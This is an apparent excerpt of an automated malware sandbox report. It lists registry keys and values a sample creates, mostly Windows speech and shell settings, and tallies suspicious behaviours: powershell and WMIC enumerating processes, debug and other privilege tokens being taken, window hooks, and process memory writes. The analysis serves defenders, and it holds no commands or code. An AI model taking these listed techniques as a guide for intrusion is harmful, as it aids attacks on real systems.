description ioc Process Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\es-ES\\VoiceActivation_es-ES.dat" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - ja-JP Embedded DNN v11.1" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\sidubm.table" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "DebugPlugin" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\L1036" Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\\Tokens\\MSTTS_V110_EnUS_ZiraM" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Stefan" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda - German (Germany)" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5218064" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hortense" Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Spanish (Spain)" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\it-IT\\M1040Elsa" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - Italian (Italy)" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23" Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_HW_en-US.dat" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Lts Lexicon" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\fr-FR\\VoiceActivation_HW_fr-FR.dat" Process not Found Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-870806430-2618236806-3023919190-1000\{4A6C98DF-B751-41E2-B825-2986AFC37D07} Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HW" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1033-110-WINMO-DNN" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Locale Handler" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Japanese (Japan)" Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{14E74C62-DC97-43B0-8F2F-581496A65D60}" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Mark" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5223743" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\r3082sr.lxa" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 4e003100000000006e59b55e1000486f6e6500003a0009000400efbe6e59b55e6e59c25e2e00000052500400000028000000000000000000000000000000313e7b0048006f006e006500000014000000 Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "409;9" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\lsr3082.lxa" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE/SOFTWARE\\Microsoft\\Speech_OneCore\\AudioOutput\\TokenEnums\\MMAudioOut\\" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{BAE3E62C-37D4-49AC-A6F1-0E485ECD6757}" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\c3082.fe" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lookup Lexicon" Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\MuiCache Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - English (United States)" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Laura" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5e003100000000006e592b5f1000484f4e4552457e310000460009000400efbe6e59b55e6e592b5f2e0000005450040000002800000000000000000000000000000055f4df0048006f006e006500520065007600650072007400000018000000 Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "40C" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Near" Process not Found -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1744 reg.exe 2532 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1772 powershell.exe 2452 powershell.exe 5112 powershell.exe 5112 powershell.exe 2008 WMIC.exe 2008 WMIC.exe 2008 WMIC.exe 2008 WMIC.exe 1772 powershell.exe 1772 powershell.exe 2452 powershell.exe 2452 powershell.exe 5112 powershell.exe 4476 WMIC.exe 4476 WMIC.exe 4476 WMIC.exe 4476 WMIC.exe 4692 WMIC.exe 4692 WMIC.exe 4692 WMIC.exe 4692 WMIC.exe 1220 powershell.exe 1220 powershell.exe 1220 powershell.exe 4516 powershell.exe 4516 powershell.exe 1960 powershell.exe 1960 powershell.exe 4820 WMIC.exe 4820 WMIC.exe 4820 WMIC.exe 4820 WMIC.exe 4448 WMIC.exe 4448 WMIC.exe 4448 WMIC.exe 4448 WMIC.exe 3532 WMIC.exe 3532 WMIC.exe 3532 WMIC.exe 3532 WMIC.exe 4432 powershell.exe 4432 powershell.exe 1264 WMIC.exe 1264 WMIC.exe 1264 WMIC.exe 1264 WMIC.exe 3776 powershell.exe 3776 powershell.exe 3688 powershell.exe 3688 powershell.exe 4304 powershell.exe 4304 powershell.exe 4560 WMIC.exe 4560 WMIC.exe 4560 WMIC.exe 4560 WMIC.exe 3100 WMIC.exe 3100 WMIC.exe 3100 WMIC.exe 3100 WMIC.exe 4676 WMIC.exe 4676 WMIC.exe 4676 WMIC.exe 4676 WMIC.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1772 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 1212 tasklist.exe Token: SeDebugPrivilege 5112 powershell.exe Token: SeIncreaseQuotaPrivilege 2008 WMIC.exe Token: SeSecurityPrivilege 2008 WMIC.exe Token: SeTakeOwnershipPrivilege 2008 WMIC.exe Token: SeLoadDriverPrivilege 2008 WMIC.exe Token: SeSystemProfilePrivilege 2008 WMIC.exe Token: SeSystemtimePrivilege 2008 WMIC.exe Token: SeProfSingleProcessPrivilege 2008 WMIC.exe Token: SeIncBasePriorityPrivilege 2008 WMIC.exe Token: SeCreatePagefilePrivilege 2008 WMIC.exe Token: SeBackupPrivilege 2008 WMIC.exe Token: SeRestorePrivilege 2008 WMIC.exe Token: SeShutdownPrivilege 2008 WMIC.exe Token: SeDebugPrivilege 2008 WMIC.exe Token: SeSystemEnvironmentPrivilege 2008 WMIC.exe Token: SeRemoteShutdownPrivilege 2008 WMIC.exe Token: SeUndockPrivilege 2008 WMIC.exe Token: SeManageVolumePrivilege 2008 WMIC.exe Token: 33 2008 WMIC.exe Token: 34 2008 WMIC.exe Token: 35 2008 WMIC.exe Token: 36 2008 WMIC.exe Token: SeIncreaseQuotaPrivilege 2008 WMIC.exe Token: SeSecurityPrivilege 2008 WMIC.exe Token: SeTakeOwnershipPrivilege 2008 WMIC.exe Token: SeLoadDriverPrivilege 2008 WMIC.exe Token: SeSystemProfilePrivilege 2008 WMIC.exe Token: SeSystemtimePrivilege 2008 WMIC.exe Token: SeProfSingleProcessPrivilege 2008 WMIC.exe Token: SeIncBasePriorityPrivilege 2008 WMIC.exe Token: SeCreatePagefilePrivilege 2008 WMIC.exe Token: SeBackupPrivilege 2008 WMIC.exe Token: SeRestorePrivilege 2008 WMIC.exe Token: SeShutdownPrivilege 2008 WMIC.exe Token: SeDebugPrivilege 2008 WMIC.exe Token: SeSystemEnvironmentPrivilege 2008 WMIC.exe Token: SeRemoteShutdownPrivilege 2008 WMIC.exe Token: SeUndockPrivilege 2008 WMIC.exe Token: SeManageVolumePrivilege 2008 WMIC.exe Token: 33 2008 WMIC.exe Token: 34 2008 WMIC.exe Token: 35 2008 WMIC.exe Token: 36 2008 WMIC.exe Token: SeIncreaseQuotaPrivilege 2452 powershell.exe Token: SeSecurityPrivilege 2452 powershell.exe Token: SeTakeOwnershipPrivilege 2452 powershell.exe Token: SeLoadDriverPrivilege 2452 powershell.exe Token: SeSystemProfilePrivilege 2452 powershell.exe Token: SeSystemtimePrivilege 2452 powershell.exe Token: SeProfSingleProcessPrivilege 2452 powershell.exe Token: SeIncBasePriorityPrivilege 2452 powershell.exe Token: SeCreatePagefilePrivilege 2452 powershell.exe Token: SeBackupPrivilege 2452 powershell.exe Token: SeRestorePrivilege 2452 powershell.exe Token: SeShutdownPrivilege 2452 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeSystemEnvironmentPrivilege 2452 powershell.exe Token: SeRemoteShutdownPrivilege 2452 powershell.exe Token: SeUndockPrivilege 2452 powershell.exe Token: SeManageVolumePrivilege 2452 powershell.exe Token: 33 2452 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 1900 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found 4232 Process not Found -
Suspicious use of SetWindowsHookEx 20 IoCs
pid Process 2552 Process not Found 4660 Process not Found 552 Process not Found 4660 Process not Found 1692 Process not Found 2660 Process not Found 2016 Process not Found 2016 Process not Found 3400 Process not Found 2288 Process not Found 2368 Process not Found 2368 Process not Found 4052 Process not Found 3548 Process not Found 1444 Process not Found 1444 Process not Found 2624 Process not Found 2492 Process not Found 1212 Process not Found 1212 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
